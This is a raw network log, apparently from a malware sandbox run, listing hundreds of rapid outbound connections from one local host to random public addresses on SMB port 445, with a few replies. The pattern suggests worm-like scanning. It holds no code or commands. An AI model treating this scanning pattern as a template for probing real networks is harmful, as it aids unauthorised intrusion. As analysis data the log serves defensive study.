May 8, 2023 05:36:37.375211954 CEST	50702	445	192.168.2.6	39.7.106.173
May 8, 2023 05:36:37.375267982 CEST	50699	445	192.168.2.6	172.89.233.234
May 8, 2023 05:36:37.419708014 CEST	50703	445	192.168.2.6	76.145.105.45
May 8, 2023 05:36:37.420447111 CEST	50704	445	192.168.2.6	19.69.33.165
May 8, 2023 05:36:37.709412098 CEST	50705	445	192.168.2.6	37.44.164.29
May 8, 2023 05:36:37.935312033 CEST	50706	445	192.168.2.6	185.113.214.164
May 8, 2023 05:36:38.138360977 CEST	50707	445	192.168.2.6	187.250.100.214
May 8, 2023 05:36:38.169749975 CEST	50708	445	192.168.2.6	107.165.99.23
May 8, 2023 05:36:38.404400110 CEST	50709	445	192.168.2.6	21.207.126.171
May 8, 2023 05:36:38.450984001 CEST	50711	445	192.168.2.6	219.20.125.115
May 8, 2023 05:36:38.451150894 CEST	50710	445	192.168.2.6	134.77.223.57
May 8, 2023 05:36:38.451149940 CEST	50712	445	192.168.2.6	9.247.62.175
May 8, 2023 05:36:38.451153994 CEST	50713	445	192.168.2.6	46.126.43.74
May 8, 2023 05:36:38.451284885 CEST	50714	445	192.168.2.6	48.31.76.45
May 8, 2023 05:36:38.451356888 CEST	50715	445	192.168.2.6	35.50.226.152
May 8, 2023 05:36:38.451421976 CEST	50717	445	192.168.2.6	130.113.250.120
May 8, 2023 05:36:38.451630116 CEST	50718	445	192.168.2.6	177.183.215.250
May 8, 2023 05:36:38.451688051 CEST	50720	445	192.168.2.6	37.88.216.233
May 8, 2023 05:36:38.451739073 CEST	50716	445	192.168.2.6	92.44.9.4
May 8, 2023 05:36:38.451740026 CEST	50719	445	192.168.2.6	88.163.198.11
May 8, 2023 05:36:38.451786995 CEST	50722	445	192.168.2.6	19.31.63.169
May 8, 2023 05:36:38.451786041 CEST	50721	445	192.168.2.6	82.197.126.231
May 8, 2023 05:36:38.451828003 CEST	50723	445	192.168.2.6	198.144.213.166
May 8, 2023 05:36:38.451920033 CEST	50724	445	192.168.2.6	114.105.211.179
May 8, 2023 05:36:38.514537096 CEST	50725	445	192.168.2.6	32.140.92.241
May 8, 2023 05:36:38.515063047 CEST	50726	445	192.168.2.6	144.97.162.178
May 8, 2023 05:36:38.516133070 CEST	50727	445	192.168.2.6	141.219.110.13
May 8, 2023 05:36:38.516983032 CEST	50728	445	192.168.2.6	120.211.5.189
May 8, 2023 05:36:38.517616987 CEST	50729	445	192.168.2.6	36.173.73.6
May 8, 2023 05:36:38.518543959 CEST	50730	445	192.168.2.6	32.167.180.147
May 8, 2023 05:36:38.519565105 CEST	50731	445	192.168.2.6	4.199.250.138
May 8, 2023 05:36:38.545514107 CEST	50732	445	192.168.2.6	41.180.252.188
May 8, 2023 05:36:38.545588970 CEST	50733	445	192.168.2.6	152.174.105.200
May 8, 2023 05:36:38.810317993 CEST	50734	445	192.168.2.6	125.77.97.249
May 8, 2023 05:36:39.060672045 CEST	50735	445	192.168.2.6	56.143.156.31
May 8, 2023 05:36:39.232386112 CEST	50736	445	192.168.2.6	107.165.99.24
May 8, 2023 05:36:39.247920036 CEST	50737	445	192.168.2.6	207.73.195.12
May 8, 2023 05:36:39.535726070 CEST	50738	445	192.168.2.6	209.193.182.51
May 8, 2023 05:36:39.560493946 CEST	50740	445	192.168.2.6	188.126.104.96
May 8, 2023 05:36:39.560519934 CEST	50739	445	192.168.2.6	167.126.184.109
May 8, 2023 05:36:39.560661077 CEST	50741	445	192.168.2.6	76.76.130.225
May 8, 2023 05:36:39.560770035 CEST	50742	445	192.168.2.6	14.168.171.153
May 8, 2023 05:36:39.560827017 CEST	50743	445	192.168.2.6	107.152.120.142
May 8, 2023 05:36:39.560905933 CEST	50744	445	192.168.2.6	210.188.79.251
May 8, 2023 05:36:39.560981035 CEST	50745	445	192.168.2.6	210.235.27.165
May 8, 2023 05:36:39.561037064 CEST	50746	445	192.168.2.6	40.141.168.89
May 8, 2023 05:36:39.561166048 CEST	50748	445	192.168.2.6	38.25.229.41
May 8, 2023 05:36:39.561283112 CEST	50749	445	192.168.2.6	173.189.161.224
May 8, 2023 05:36:39.561316967 CEST	50750	445	192.168.2.6	89.80.126.143
May 8, 2023 05:36:39.561484098 CEST	50752	445	192.168.2.6	219.35.231.185
May 8, 2023 05:36:39.561496019 CEST	50751	445	192.168.2.6	168.128.187.116
May 8, 2023 05:36:39.561621904 CEST	50753	445	192.168.2.6	162.93.150.225
May 8, 2023 05:36:39.640218019 CEST	50754	445	192.168.2.6	183.43.161.189
May 8, 2023 05:36:39.642127037 CEST	50755	445	192.168.2.6	146.101.6.205
May 8, 2023 05:36:39.644119024 CEST	50756	445	192.168.2.6	208.254.245.236
May 8, 2023 05:36:39.645826101 CEST	50757	445	192.168.2.6	94.48.43.1
May 8, 2023 05:36:39.647520065 CEST	50758	445	192.168.2.6	132.213.204.233
May 8, 2023 05:36:39.649105072 CEST	50759	445	192.168.2.6	89.106.95.239
May 8, 2023 05:36:39.650517941 CEST	50760	445	192.168.2.6	92.92.188.182
May 8, 2023 05:36:39.655226946 CEST	50761	445	192.168.2.6	176.102.92.196
May 8, 2023 05:36:39.655436039 CEST	50762	445	192.168.2.6	111.126.196.45
May 8, 2023 05:36:39.700692892 CEST	445	50741	76.76.130.225	192.168.2.6
May 8, 2023 05:36:39.716991901 CEST	50763	445	192.168.2.6	158.3.163.146
May 8, 2023 05:36:39.926393986 CEST	50764	445	192.168.2.6	125.180.177.189
May 8, 2023 05:36:40.170027971 CEST	50765	445	192.168.2.6	5.70.51.169
May 8, 2023 05:36:40.200882912 CEST	50741	445	192.168.2.6	76.76.130.225
May 8, 2023 05:36:40.295331955 CEST	50766	445	192.168.2.6	107.165.99.25
May 8, 2023 05:36:40.358000994 CEST	50767	445	192.168.2.6	139.51.32.175
May 8, 2023 05:36:40.656944990 CEST	50768	445	192.168.2.6	117.58.165.91
May 8, 2023 05:36:40.685764074 CEST	50770	445	192.168.2.6	26.154.140.184
May 8, 2023 05:36:40.685909986 CEST	50769	445	192.168.2.6	153.78.148.222
May 8, 2023 05:36:40.686062098 CEST	50771	445	192.168.2.6	165.126.133.204
May 8, 2023 05:36:40.686276913 CEST	50772	445	192.168.2.6	64.28.61.164
May 8, 2023 05:36:40.686470032 CEST	50773	445	192.168.2.6	90.231.252.3
May 8, 2023 05:36:40.686722994 CEST	50774	445	192.168.2.6	50.154.176.185
May 8, 2023 05:36:40.686873913 CEST	50775	445	192.168.2.6	84.89.117.185
May 8, 2023 05:36:40.687150002 CEST	50776	445	192.168.2.6	48.13.174.226
May 8, 2023 05:36:40.687279940 CEST	50777	445	192.168.2.6	210.165.125.74
May 8, 2023 05:36:40.687532902 CEST	50778	445	192.168.2.6	72.18.128.172
May 8, 2023 05:36:40.687727928 CEST	50779	445	192.168.2.6	169.47.172.19
May 8, 2023 05:36:40.687875032 CEST	50780	445	192.168.2.6	61.176.94.46
May 8, 2023 05:36:40.688040972 CEST	50781	445	192.168.2.6	202.217.219.241
May 8, 2023 05:36:40.688290119 CEST	50782	445	192.168.2.6	130.234.151.218
May 8, 2023 05:36:40.688517094 CEST	50783	445	192.168.2.6	134.63.176.70
May 8, 2023 05:36:40.763668060 CEST	50784	445	192.168.2.6	108.3.127.43
May 8, 2023 05:36:40.763672113 CEST	50785	445	192.168.2.6	83.106.108.155
May 8, 2023 05:36:40.766077995 CEST	50786	445	192.168.2.6	95.254.116.121
May 8, 2023 05:36:40.766194105 CEST	50787	445	192.168.2.6	190.243.245.44
May 8, 2023 05:36:40.766235113 CEST	50788	445	192.168.2.6	115.72.49.210
May 8, 2023 05:36:40.766235113 CEST	50789	445	192.168.2.6	156.148.96.59
May 8, 2023 05:36:40.766330957 CEST	50792	445	192.168.2.6	203.130.171.60
May 8, 2023 05:36:40.766518116 CEST	50790	445	192.168.2.6	176.178.171.144
May 8, 2023 05:36:40.766518116 CEST	50791	445	192.168.2.6	16.232.33.218
May 8, 2023 05:36:40.842453003 CEST	50793	445	192.168.2.6	65.148.190.3
May 8, 2023 05:36:41.029290915 CEST	50794	445	192.168.2.6	106.62.33.167
May 8, 2023 05:36:41.279722929 CEST	50795	445	192.168.2.6	133.128.23.253
May 8, 2023 05:36:41.373353004 CEST	50796	445	192.168.2.6	107.165.99.26
May 8, 2023 05:36:41.467190981 CEST	50797	445	192.168.2.6	195.179.63.62
May 8, 2023 05:36:41.743144989 CEST	50798	445	192.168.2.6	100.181.93.252
May 8, 2023 05:36:41.780337095 CEST	50799	445	192.168.2.6	95.170.91.126
May 8, 2023 05:36:41.811022043 CEST	50800	445	192.168.2.6	90.17.142.147
May 8, 2023 05:36:41.811269045 CEST	50801	445	192.168.2.6	97.109.169.22
May 8, 2023 05:36:41.811813116 CEST	50802	445	192.168.2.6	194.79.21.196
May 8, 2023 05:36:41.812050104 CEST	50803	445	192.168.2.6	10.63.27.135
May 8, 2023 05:36:41.812823057 CEST	50804	445	192.168.2.6	208.33.190.222
May 8, 2023 05:36:41.813131094 CEST	50805	445	192.168.2.6	6.105.20.112
May 8, 2023 05:36:41.813676119 CEST	50806	445	192.168.2.6	25.199.179.179
May 8, 2023 05:36:41.814438105 CEST	50807	445	192.168.2.6	178.72.12.225
May 8, 2023 05:36:41.814678907 CEST	50808	445	192.168.2.6	134.122.238.234
May 8, 2023 05:36:41.815201044 CEST	50809	445	192.168.2.6	11.36.230.80
May 8, 2023 05:36:41.815452099 CEST	50810	445	192.168.2.6	132.6.47.46
May 8, 2023 05:36:41.815651894 CEST	50811	445	192.168.2.6	217.91.81.227
May 8, 2023 05:36:41.815870047 CEST	50812	445	192.168.2.6	101.159.172.21
May 8, 2023 05:36:41.816075087 CEST	50813	445	192.168.2.6	132.140.120.83
May 8, 2023 05:36:41.816274881 CEST	50814	445	192.168.2.6	141.131.180.109
May 8, 2023 05:36:41.889173031 CEST	50815	445	192.168.2.6	28.167.43.120
May 8, 2023 05:36:41.889322996 CEST	50816	445	192.168.2.6	112.166.9.54
May 8, 2023 05:36:41.889916897 CEST	50817	445	192.168.2.6	132.212.13.53
May 8, 2023 05:36:41.890655994 CEST	50818	445	192.168.2.6	171.208.45.14
May 8, 2023 05:36:41.891125917 CEST	50819	445	192.168.2.6	139.215.168.147
May 8, 2023 05:36:41.891911983 CEST	50820	445	192.168.2.6	172.93.132.184
May 8, 2023 05:36:41.892946005 CEST	50821	445	192.168.2.6	223.101.133.150
May 8, 2023 05:36:41.892970085 CEST	50822	445	192.168.2.6	67.45.91.247
May 8, 2023 05:36:41.893002987 CEST	50823	445	192.168.2.6	9.22.133.238
May 8, 2023 05:36:41.951302052 CEST	50824	445	192.168.2.6	77.45.84.162
May 8, 2023 05:36:42.062553883 CEST	445	50824	77.45.84.162	192.168.2.6
May 8, 2023 05:36:42.155592918 CEST	50825	445	192.168.2.6	96.134.177.40
May 8, 2023 05:36:42.388698101 CEST	50826	445	192.168.2.6	42.53.45.202
May 8, 2023 05:36:42.436481953 CEST	50827	445	192.168.2.6	107.165.99.27
May 8, 2023 05:36:42.576152086 CEST	50824	445	192.168.2.6	77.45.84.162
May 8, 2023 05:36:42.576984882 CEST	50828	445	192.168.2.6	182.98.136.96
May 8, 2023 05:36:42.628990889 CEST	445	50824	77.45.84.162	192.168.2.6
May 8, 2023 05:36:42.842519999 CEST	50829	445	192.168.2.6	6.63.192.141
May 8, 2023 05:36:42.890119076 CEST	50830	445	192.168.2.6	57.205.31.162
May 8, 2023 05:36:42.923353910 CEST	50831	445	192.168.2.6	175.68.216.176
May 8, 2023 05:36:42.924721956 CEST	50832	445	192.168.2.6	147.166.189.14
May 8, 2023 05:36:42.924848080 CEST	50833	445	192.168.2.6	108.18.253.226
May 8, 2023 05:36:42.933067083 CEST	50834	445	192.168.2.6	201.122.94.51
May 8, 2023 05:36:42.933283091 CEST	50835	445	192.168.2.6	52.244.168.28
May 8, 2023 05:36:42.933451891 CEST	50836	445	192.168.2.6	218.57.118.139
May 8, 2023 05:36:42.933597088 CEST	50837	445	192.168.2.6	196.123.124.117
May 8, 2023 05:36:42.933768034 CEST	50838	445	192.168.2.6	165.180.46.224
May 8, 2023 05:36:42.933904886 CEST	50840	445	192.168.2.6	146.169.104.233
May 8, 2023 05:36:42.933965921 CEST	50839	445	192.168.2.6	177.26.70.62
May 8, 2023 05:36:42.934149027 CEST	50841	445	192.168.2.6	40.54.138.108
May 8, 2023 05:36:42.934166908 CEST	50842	445	192.168.2.6	129.25.22.95
May 8, 2023 05:36:42.934292078 CEST	50843	445	192.168.2.6	13.63.95.97
May 8, 2023 05:36:42.934318066 CEST	50844	445	192.168.2.6	34.41.192.12
May 8, 2023 05:36:42.934417963 CEST	50845	445	192.168.2.6	104.81.65.45
May 8, 2023 05:36:42.998554945 CEST	50846	445	192.168.2.6	75.177.109.234
May 8, 2023 05:36:42.999445915 CEST	50847	445	192.168.2.6	26.46.140.3
May 8, 2023 05:36:43.014467001 CEST	50848	445	192.168.2.6	4.202.17.202
May 8, 2023 05:36:43.015105009 CEST	50849	445	192.168.2.6	102.111.68.153
May 8, 2023 05:36:43.015578032 CEST	50850	445	192.168.2.6	32.104.67.50
May 8, 2023 05:36:43.016239882 CEST	50851	445	192.168.2.6	28.206.191.6
May 8, 2023 05:36:43.016659021 CEST	50852	445	192.168.2.6	163.68.170.202
May 8, 2023 05:36:43.017121077 CEST	50853	445	192.168.2.6	104.232.57.77
May 8, 2023 05:36:43.017725945 CEST	50854	445	192.168.2.6	182.163.178.100
May 8, 2023 05:36:43.060877085 CEST	50855	445	192.168.2.6	121.85.178.126
May 8, 2023 05:36:43.279649019 CEST	50856	445	192.168.2.6	198.253.13.97
May 8, 2023 05:36:43.498511076 CEST	50857	445	192.168.2.6	107.165.99.28
May 8, 2023 05:36:43.513931990 CEST	50858	445	192.168.2.6	116.183.194.174
May 8, 2023 05:36:43.699276924 CEST	50859	445	192.168.2.6	81.195.212.32
May 8, 2023 05:36:43.753284931 CEST	50860	445	192.168.2.6	62.53.177.6
May 8, 2023 05:36:43.954128027 CEST	50861	445	192.168.2.6	217.234.49.77
May 8, 2023 05:36:43.998823881 CEST	50862	445	192.168.2.6	136.91.102.88
May 8, 2023 05:36:44.045800924 CEST	50863	445	192.168.2.6	162.214.95.57
May 8, 2023 05:36:44.045986891 CEST	50864	445	192.168.2.6	75.80.140.81
May 8, 2023 05:36:44.046196938 CEST	50866	445	192.168.2.6	30.185.53.142
May 8, 2023 05:36:44.046200991 CEST	50865	445	192.168.2.6	111.231.165.242
May 8, 2023 05:36:44.046305895 CEST	50867	445	192.168.2.6	123.158.132.24
May 8, 2023 05:36:44.046478033 CEST	50869	445	192.168.2.6	78.47.49.183
May 8, 2023 05:36:44.046482086 CEST	50868	445	192.168.2.6	19.223.149.160
May 8, 2023 05:36:44.046562910 CEST	50870	445	192.168.2.6	41.135.142.235
May 8, 2023 05:36:44.046658039 CEST	50871	445	192.168.2.6	121.150.90.18
May 8, 2023 05:36:44.046753883 CEST	50872	445	192.168.2.6	172.210.55.55
May 8, 2023 05:36:44.046829939 CEST	50873	445	192.168.2.6	147.1.51.191
May 8, 2023 05:36:44.046914101 CEST	50874	445	192.168.2.6	12.232.163.219
May 8, 2023 05:36:44.047005892 CEST	50875	445	192.168.2.6	215.185.158.75
May 8, 2023 05:36:44.047111034 CEST	50876	445	192.168.2.6	96.153.4.7
May 8, 2023 05:36:44.047194004 CEST	50877	445	192.168.2.6	23.226.245.15
May 8, 2023 05:36:44.123327971 CEST	50878	445	192.168.2.6	81.100.117.65
May 8, 2023 05:36:44.123429060 CEST	50879	445	192.168.2.6	39.213.21.109
May 8, 2023 05:36:44.125355005 CEST	50881	445	192.168.2.6	208.139.169.195
May 8, 2023 05:36:44.125396967 CEST	50880	445	192.168.2.6	28.50.165.38
May 8, 2023 05:36:44.125555038 CEST	50882	445	192.168.2.6	181.106.13.59
May 8, 2023 05:36:44.125555038 CEST	50883	445	192.168.2.6	208.0.104.195
May 8, 2023 05:36:44.125579119 CEST	50884	445	192.168.2.6	129.139.26.57
May 8, 2023 05:36:44.125644922 CEST	50885	445	192.168.2.6	98.188.233.116
May 8, 2023 05:36:44.125678062 CEST	50886	445	192.168.2.6	140.23.152.67
May 8, 2023 05:36:44.186599970 CEST	50887	445	192.168.2.6	170.24.39.150
May 8, 2023 05:36:44.388940096 CEST	50888	445	192.168.2.6	176.172.154.91
May 8, 2023 05:36:44.561234951 CEST	50889	445	192.168.2.6	107.165.99.29
May 8, 2023 05:36:44.623636007 CEST	50890	445	192.168.2.6	186.222.146.133
May 8, 2023 05:36:44.800354958 CEST	50891	445	192.168.2.6	167.85.210.76
May 8, 2023 05:36:44.857877970 CEST	50892	445	192.168.2.6	5.194.144.24
May 8, 2023 05:36:45.062594891 CEST	50893	445	192.168.2.6	29.72.120.171
May 8, 2023 05:36:45.124517918 CEST	50894	445	192.168.2.6	69.212.150.11
May 8, 2023 05:36:45.170798063 CEST	50895	445	192.168.2.6	155.155.129.223
May 8, 2023 05:36:45.171016932 CEST	50896	445	192.168.2.6	12.37.26.34
May 8, 2023 05:36:45.171360970 CEST	50897	445	192.168.2.6	60.10.111.14
May 8, 2023 05:36:45.171529055 CEST	50898	445	192.168.2.6	160.77.49.204
May 8, 2023 05:36:45.171833038 CEST	50899	445	192.168.2.6	151.104.42.96
May 8, 2023 05:36:45.172168970 CEST	50900	445	192.168.2.6	154.247.178.97
May 8, 2023 05:36:45.172446012 CEST	50901	445	192.168.2.6	94.154.105.139
May 8, 2023 05:36:45.172797918 CEST	50902	445	192.168.2.6	169.108.141.134
May 8, 2023 05:36:45.172907114 CEST	50903	445	192.168.2.6	5.227.240.198
May 8, 2023 05:36:45.173091888 CEST	50904	445	192.168.2.6	177.222.230.245
May 8, 2023 05:36:45.173453093 CEST	50905	445	192.168.2.6	54.35.48.14
May 8, 2023 05:36:45.173593998 CEST	50906	445	192.168.2.6	181.151.154.129
May 8, 2023 05:36:45.173903942 CEST	50907	445	192.168.2.6	160.254.98.206
May 8, 2023 05:36:45.173903942 CEST	50908	445	192.168.2.6	84.102.183.159
May 8, 2023 05:36:45.174135923 CEST	50909	445	192.168.2.6	89.34.218.170
May 8, 2023 05:36:45.232997894 CEST	50910	445	192.168.2.6	25.17.151.34
May 8, 2023 05:36:45.233167887 CEST	50911	445	192.168.2.6	196.228.31.205
May 8, 2023 05:36:45.266552925 CEST	50912	445	192.168.2.6	114.95.215.136
May 8, 2023 05:36:45.266756058 CEST	50913	445	192.168.2.6	54.173.220.228
May 8, 2023 05:36:45.266786098 CEST	50914	445	192.168.2.6	43.46.114.219
May 8, 2023 05:36:45.266880035 CEST	50915	445	192.168.2.6	84.78.36.220
May 8, 2023 05:36:45.266961098 CEST	50917	445	192.168.2.6	83.9.170.217
May 8, 2023 05:36:45.267019033 CEST	50918	445	192.168.2.6	143.119.221.116
May 8, 2023 05:36:45.267241955 CEST	50916	445	192.168.2.6	94.58.153.233
May 8, 2023 05:36:45.311006069 CEST	50919	445	192.168.2.6	47.200.215.122
May 8, 2023 05:36:45.421767950 CEST	445	50916	94.58.153.233	192.168.2.6
May 8, 2023 05:36:45.499092102 CEST	50920	445	192.168.2.6	79.48.252.69
May 8, 2023 05:36:45.639600992 CEST	50921	445	192.168.2.6	107.165.99.30
May 8, 2023 05:36:45.733930111 CEST	50922	445	192.168.2.6	220.134.68.221
May 8, 2023 05:36:45.921210051 CEST	50924	445	192.168.2.6	35.107.172.178
May 8, 2023 05:36:45.935699940 CEST	50916	445	192.168.2.6	94.58.153.233
May 8, 2023 05:36:45.982903957 CEST	50925	445	192.168.2.6	10.101.188.80
May 8, 2023 05:36:46.004888058 CEST	445	50922	220.134.68.221	192.168.2.6
May 8, 2023 05:36:46.085702896 CEST	445	50916	94.58.153.233	192.168.2.6
May 8, 2023 05:36:46.186242104 CEST	50926	445	192.168.2.6	208.4.86.223
May 8, 2023 05:36:46.234539986 CEST	50927	445	192.168.2.6	84.106.175.62
May 8, 2023 05:36:46.279863119 CEST	50928	445	192.168.2.6	117.235.210.85
May 8, 2023 05:36:46.280040979 CEST	50929	445	192.168.2.6	163.196.68.212
May 8, 2023 05:36:46.280236959 CEST	50930	445	192.168.2.6	92.112.72.192
May 8, 2023 05:36:46.280345917 CEST	50931	445	192.168.2.6	209.34.90.4
May 8, 2023 05:36:46.280539036 CEST	50932	445	192.168.2.6	29.29.238.134
May 8, 2023 05:36:46.280714989 CEST	50933	445	192.168.2.6	179.84.122.232
May 8, 2023 05:36:46.280906916 CEST	50934	445	192.168.2.6	198.254.209.193
May 8, 2023 05:36:46.281162024 CEST	50935	445	192.168.2.6	5.236.132.164
May 8, 2023 05:36:46.281331062 CEST	50936	445	192.168.2.6	89.223.189.205
May 8, 2023 05:36:46.281502008 CEST	50937	445	192.168.2.6	67.170.192.253
May 8, 2023 05:36:46.281696081 CEST	50938	445	192.168.2.6	218.160.242.64
May 8, 2023 05:36:46.281871080 CEST	50939	445	192.168.2.6	110.222.232.224
May 8, 2023 05:36:46.282075882 CEST	50940	445	192.168.2.6	79.239.54.192
May 8, 2023 05:36:46.282161951 CEST	50941	445	192.168.2.6	152.50.149.219
May 8, 2023 05:36:46.282310963 CEST	50942	445	192.168.2.6	115.175.192.97
May 8, 2023 05:36:46.342267036 CEST	50943	445	192.168.2.6	220.165.241.248
May 8, 2023 05:36:46.342354059 CEST	50944	445	192.168.2.6	203.135.190.51
May 8, 2023 05:36:46.374208927 CEST	50945	445	192.168.2.6	119.168.192.209
May 8, 2023 05:36:46.374907017 CEST	50946	445	192.168.2.6	85.49.47.162
May 8, 2023 05:36:46.375346899 CEST	50947	445	192.168.2.6	2.87.12.63
May 8, 2023 05:36:46.376007080 CEST	50948	445	192.168.2.6	167.5.31.226
May 8, 2023 05:36:46.376573086 CEST	50949	445	192.168.2.6	29.74.242.44
May 8, 2023 05:36:46.377055883 CEST	50950	445	192.168.2.6	211.164.70.78
May 8, 2023 05:36:46.377727032 CEST	50951	445	192.168.2.6	191.124.103.44
May 8, 2023 05:36:46.436269999 CEST	50952	445	192.168.2.6	30.127.213.214
May 8, 2023 05:36:46.513917923 CEST	50922	445	192.168.2.6	220.134.68.221
May 8, 2023 05:36:46.624226093 CEST	50953	445	192.168.2.6	66.179.14.144
May 8, 2023 05:36:46.717482090 CEST	50954	445	192.168.2.6	107.165.99.31
May 8, 2023 05:36:46.779781103 CEST	445	50922	220.134.68.221	192.168.2.6
May 8, 2023 05:36:46.858443022 CEST	50955	445	192.168.2.6	21.103.36.67
May 8, 2023 05:36:47.030527115 CEST	50957	445	192.168.2.6	63.154.174.104
May 8, 2023 05:36:47.117185116 CEST	50958	445	192.168.2.6	15.153.107.98
May 8, 2023 05:36:47.408752918 CEST	50959	445	192.168.2.6	165.36.48.73
May 8, 2023 05:36:47.408757925 CEST	50960	445	192.168.2.6	3.113.225.23
May 8, 2023 05:36:47.462474108 CEST	50961	445	192.168.2.6	169.19.91.120
May 8, 2023 05:36:47.462771893 CEST	50962	445	192.168.2.6	21.25.9.155
May 8, 2023 05:36:47.462922096 CEST	50963	445	192.168.2.6	118.103.206.35
May 8, 2023 05:36:47.463107109 CEST	50964	445	192.168.2.6	112.14.10.234
May 8, 2023 05:36:47.463342905 CEST	50965	445	192.168.2.6	29.120.225.177
May 8, 2023 05:36:47.463571072 CEST	50966	445	192.168.2.6	199.18.105.156
May 8, 2023 05:36:47.463769913 CEST	50967	445	192.168.2.6	52.194.207.11
May 8, 2023 05:36:47.463959932 CEST	50968	445	192.168.2.6	34.0.50.46
May 8, 2023 05:36:47.464102030 CEST	50969	445	192.168.2.6	42.30.106.107
May 8, 2023 05:36:47.464258909 CEST	50970	445	192.168.2.6	120.24.183.26
May 8, 2023 05:36:47.464477062 CEST	50971	445	192.168.2.6	205.0.101.61
May 8, 2023 05:36:47.464683056 CEST	50972	445	192.168.2.6	98.34.55.43
May 8, 2023 05:36:47.464864969 CEST	50973	445	192.168.2.6	195.61.193.133
May 8, 2023 05:36:47.464988947 CEST	50974	445	192.168.2.6	167.220.126.170
May 8, 2023 05:36:47.465162992 CEST	50975	445	192.168.2.6	199.73.163.119
May 8, 2023 05:36:47.469271898 CEST	50976	445	192.168.2.6	122.20.105.137
May 8, 2023 05:36:47.469432116 CEST	50977	445	192.168.2.6	88.93.196.60
May 8, 2023 05:36:47.519551992 CEST	50978	445	192.168.2.6	166.216.102.243
May 8, 2023 05:36:47.520035982 CEST	50979	445	192.168.2.6	94.235.254.4
May 8, 2023 05:36:47.520723104 CEST	50980	445	192.168.2.6	45.194.140.246
May 8, 2023 05:36:47.521161079 CEST	50981	445	192.168.2.6	193.231.199.170
May 8, 2023 05:36:47.521682978 CEST	50982	445	192.168.2.6	62.169.25.14
May 8, 2023 05:36:47.522295952 CEST	50983	445	192.168.2.6	183.61.207.121
May 8, 2023 05:36:47.522780895 CEST	50984	445	192.168.2.6	107.153.0.127
May 8, 2023 05:36:47.577836990 CEST	50985	445	192.168.2.6	152.129.134.95
May 8, 2023 05:36:47.791532040 CEST	50986	445	192.168.2.6	173.124.26.180
May 8, 2023 05:36:47.795627117 CEST	50988	445	192.168.2.6	107.165.99.32
May 8, 2023 05:36:48.014612913 CEST	50990	445	192.168.2.6	159.13.152.85
May 8, 2023 05:36:48.604585886 CEST	50991	445	192.168.2.6	184.181.223.217
May 8, 2023 05:36:48.702120066 CEST	50992	445	192.168.2.6	44.103.39.120
May 8, 2023 05:36:48.702384949 CEST	50993	445	192.168.2.6	155.27.54.113
May 8, 2023 05:36:48.702559948 CEST	50994	445	192.168.2.6	186.14.88.44
May 8, 2023 05:36:48.702650070 CEST	50995	445	192.168.2.6	107.212.149.1
May 8, 2023 05:36:48.702812910 CEST	50996	445	192.168.2.6	125.215.158.185
May 8, 2023 05:36:48.702904940 CEST	50997	445	192.168.2.6	47.182.148.48
May 8, 2023 05:36:48.703069925 CEST	50998	445	192.168.2.6	40.234.112.219
May 8, 2023 05:36:48.703210115 CEST	50999	445	192.168.2.6	41.120.221.196
May 8, 2023 05:36:48.703308105 CEST	51000	445	192.168.2.6	149.180.46.204
May 8, 2023 05:36:48.703495026 CEST	51001	445	192.168.2.6	91.61.155.6
May 8, 2023 05:36:48.703586102 CEST	51002	445	192.168.2.6	22.244.108.225
May 8, 2023 05:36:48.768009901 CEST	51003	445	192.168.2.6	174.120.4.109
May 8, 2023 05:36:48.769206047 CEST	51004	445	192.168.2.6	197.94.105.62
May 8, 2023 05:36:48.769630909 CEST	51005	445	192.168.2.6	8.214.249.81
May 8, 2023 05:36:48.770061016 CEST	51006	445	192.168.2.6	45.162.96.222
May 8, 2023 05:36:48.771049023 CEST	51007	445	192.168.2.6	21.138.182.202
May 8, 2023 05:36:48.772480965 CEST	51008	445	192.168.2.6	128.238.35.215
May 8, 2023 05:36:48.773195982 CEST	51009	445	192.168.2.6	68.71.99.233
May 8, 2023 05:36:48.773825884 CEST	51010	445	192.168.2.6	214.17.246.54
May 8, 2023 05:36:48.774029970 CEST	51011	445	192.168.2.6	168.116.192.0
May 8, 2023 05:36:48.774210930 CEST	51012	445	192.168.2.6	151.201.9.107
May 8, 2023 05:36:48.774377108 CEST	51013	445	192.168.2.6	186.152.227.160
May 8, 2023 05:36:48.774631977 CEST	51014	445	192.168.2.6	38.136.218.127
May 8, 2023 05:36:48.774739981 CEST	51015	445	192.168.2.6	185.42.213.101
May 8, 2023 05:36:48.774970055 CEST	51016	445	192.168.2.6	115.164.236.23
May 8, 2023 05:36:48.775183916 CEST	51017	445	192.168.2.6	223.54.191.153
May 8, 2023 05:36:48.775378942 CEST	51018	445	192.168.2.6	115.69.225.6
May 8, 2023 05:36:48.775567055 CEST	51019	445	192.168.2.6	132.133.87.20
May 8, 2023 05:36:48.910573959 CEST	51020	445	192.168.2.6	174.183.182.250
May 8, 2023 05:36:48.965389967 CEST	51022	445	192.168.2.6	107.165.99.33
May 8, 2023 05:36:49.159979105 CEST	51024	445	192.168.2.6	7.152.245.11
May 8, 2023 05:36:49.956510067 CEST	51026	445	192.168.2.6	159.215.127.176
May 8, 2023 05:36:49.957108021 CEST	51027	445	192.168.2.6	72.194.71.115
May 8, 2023 05:36:49.957760096 CEST	51028	445	192.168.2.6	125.193.249.192
May 8, 2023 05:36:49.958422899 CEST	51029	445	192.168.2.6	44.35.127.76
May 8, 2023 05:36:49.959103107 CEST	51030	445	192.168.2.6	114.112.138.125
May 8, 2023 05:36:49.959875107 CEST	51031	445	192.168.2.6	115.198.7.38
May 8, 2023 05:36:49.960686922 CEST	51032	445	192.168.2.6	10.93.204.71
May 8, 2023 05:36:49.961585045 CEST	51033	445	192.168.2.6	196.198.47.110
May 8, 2023 05:36:49.961841106 CEST	51034	445	192.168.2.6	198.188.226.215
May 8, 2023 05:36:49.962064028 CEST	51035	445	192.168.2.6	54.153.179.222
May 8, 2023 05:36:49.962337017 CEST	51036	445	192.168.2.6	12.62.150.61
May 8, 2023 05:36:49.962507010 CEST	51037	445	192.168.2.6	144.237.102.103
May 8, 2023 05:36:49.962718010 CEST	51038	445	192.168.2.6	210.183.117.99
May 8, 2023 05:36:49.962939024 CEST	51039	445	192.168.2.6	215.150.118.62
May 8, 2023 05:36:49.963098049 CEST	51040	445	192.168.2.6	208.80.101.193
May 8, 2023 05:36:49.963202000 CEST	51041	445	192.168.2.6	138.12.133.166
May 8, 2023 05:36:49.963385105 CEST	51042	445	192.168.2.6	195.113.242.135
May 8, 2023 05:36:49.963610888 CEST	51043	445	192.168.2.6	180.20.24.226
May 8, 2023 05:36:49.963843107 CEST	51044	445	192.168.2.6	17.241.150.226
May 8, 2023 05:36:49.963963032 CEST	51045	445	192.168.2.6	164.25.253.243
